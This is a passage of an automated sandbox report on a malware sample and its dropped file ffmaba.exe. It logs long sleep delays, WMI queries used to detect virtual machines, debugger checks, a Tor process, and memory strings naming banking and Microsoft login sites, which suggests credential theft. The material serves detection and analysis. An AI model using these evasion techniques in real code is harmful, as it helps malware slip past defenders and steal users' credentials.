Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe TID: 7684	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep count: 6101 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep count: 3646 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe TID: 7804	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8100	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599782s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599657s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599532s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599422s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599063s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598938s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598813s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598703s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598594s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598469s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598360s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598235s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598110s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597985s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596985s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596860s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596735s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596610s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596360s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596110s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595985s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595860s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595735s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595610s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595485s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595360s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595235s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595110s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594985s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594735s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594610s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594485s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594360s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594235s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594096s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -593969s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 1100	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7524	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 1632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6096	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 4764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 3528	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1856	Thread sleep time: -9223372036854770s >= -30000s

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599782
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599657
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598938
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598813
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598703
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598469
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594096
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 593969
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: ffmaba.exe, 0000000B.00000002.2257333436.00000000028B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qemut-cq
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: ffmaba.exe, 0000000B.00000002.2257333436.00000000028B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware`,cq
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: tor-real.exe, 00000019.00000002.4506475775.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2580669352.0000000003B85000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4hQpFIf62HGFSgFPpC9pEuCY6ucujJf6Ftb2YTL+QvzBv4j65ro8p+uPnTzWQTQb
Source: yt7dW9nyJK.exe, 00000000.00000002.2067271416.0000000000640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: tor-real.exe, 00000019.00000003.2603770446.0000000003B67000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
Source: yt7dW9nyJK.exe, 00000004.00000002.4503685491.0000000000E14000.00000004.00000020.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4567101003.0000000008BA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: ffmaba.exe, 0000000B.00000002.2257333436.00000000028B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: veew:vmware
Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: dsMWdeSqEmuJJIBpLr
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: tor-real.exe, 00000019.00000003.2513085213.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IZLX8lNvJiqIXS9BPkTdcJG0LMdDTHgfSJsXP51YJFT3GhWGMmVcI3q8+JfiRaM+
Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: olC9lOqWPHK88HFMTEhwNWbT7gvrCu9S6t7YKiU0tCTrnSyoqh98BYJMKYPcVyVq6QH7wK0MITIdm5LCOdc8NQiQgosgZCikoR0VE9b14hr9AdPDqvax914xQbRvHHUserControlSystem.Windows.FormsChRU3suQZG888ENdRHUITypeEditorSystem.Drawing.DesignSystem.DrawinghJoBVTCJOFB8KbEMJfEnumqtabICjUM1yu2dXfPRE2SGhQYFowq1a4bCowl34GXL5vNW82bgMJ5lzBNpsa1J6aFfpJ9agJMulticastDelegateS38nbElj16DUH4JmgowrOlfvWiRFUqlEadjbuJQbHFNDeqVG9J5p7Jmc5DtE4OAi1XadTaq6GKDwRgE783WxvWp6FfIdB8fkUaD5p3FJwdr3aZIq4n2jNC2gHBRbtvuBlyJUPig7ystNtlItEHTD4YcGU3B3X7aUWPkHxckGKt1a6kPhq2xyog03IpvEUnRkmsThhpEnmb0GDRg1JwvqHtkcPZKoYg6xYJvGADoYIbA72EcoBeHj6l5IrCVuXw0UjhJAXcjuqEfet4MwQVESrnfkCGOjDZTXfDQQcMfUTS02PsiElBFN1VQYyPPFDDqqNNDPtg4MpPgqZnG1LR7LKxEI838eQgK6UTnMQjfwuU2UPPwPJLQsRsHPypoXGlh9FSyLkQpmpfLuvQhmVZmG0JZtewW47VKoO1A80rKYoteG0JemVRyoiielLoCsXvUvwVY22DMKX09nMNQYPNewbTihrPRL4pCKUA63i3fDdWaVOOc8904gwBAbM77CvDHNk3Wt4nnsOAh82OGR39MMrSWBIeuAxKq2AjIGjbHLJ2ABcydsMWdeSqEmuJJIBpLrnhYoc49lXKnNh5aiCvwhBZyOnDtx0yAShZ25EventArgsKfMYoKipy60SihV2CuApplicationExceptionLjKFJcGnQbFpADmDEjwShyhrkNG0qWJND3SvfKuFCZdsOPruwLDaUCG3L0NIMHLFjsoLjt29NbgqbDZfxTd3FhSpvTFfQAINhFBC6dNiNZwgFY2mwLsU9abgqviB9BUjMKYsbxiOGkaFTe6VnKKY7Tt52faTCddFBgnlGFpdxwrdyqFjguXlRandomzdH4f3pZmi7p2yCYxrFNiqGIzN6YouuO6eE2ExpandableObjectConverterSystem.ComponentModelMoLs8m78ESt4YD6gORWbY96JQ77r098fZP3507seoCK27qJBYxrPOCBskwqc7bO7TnM3ZX08JehS<Module>{C4C74D2E-796D-4738-A2CB-2385446279D3}z8kGPD7V8d7hxfofvLDR8Ws5h7LgtEIaV5HSC1lhfqZ77uv0qpfoRgUYT<PrivateImplementationDetails>{562DFE12-60DD-4FBB-98FE-0EEC878F2D71}__StaticArrayInitTypeSize=256__StaticArrayInitTypeSize=40__StaticArrayInitTypeSize=30__StaticArrayInitTypeSize=32__StaticArrayInitTypeSize=16__StaticArrayInitTypeSize=64__StaticArrayInitTypeSize=18
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tor-real.exe, 00000019.00000002.4504777802.000000000105E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
Source: ffmaba.exe, 0000000B.00000002.2262375658.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2255035504.0000000002590000.00000004.08000000.00040000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2262375658.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2332127774.0000000003BB8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qemu'T
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: nde7wqEmuJ
Source: tor-real.exe, 00000019.00000002.4508537239.00000000059E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4Z7HsFL3Y/X5CqfwtTJvNNbhGfSyZTok9JiO/lGEurgMLddZED/0WVWtcZ/YAH7k
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Process information queried: ProcessInformation

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Anti Debugging

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Code function: 4_2_02A91DF4 CheckRemoteDebuggerPresent,

4_2_02A91DF4

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Process queried: DebugPort

Enables debug privileges

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
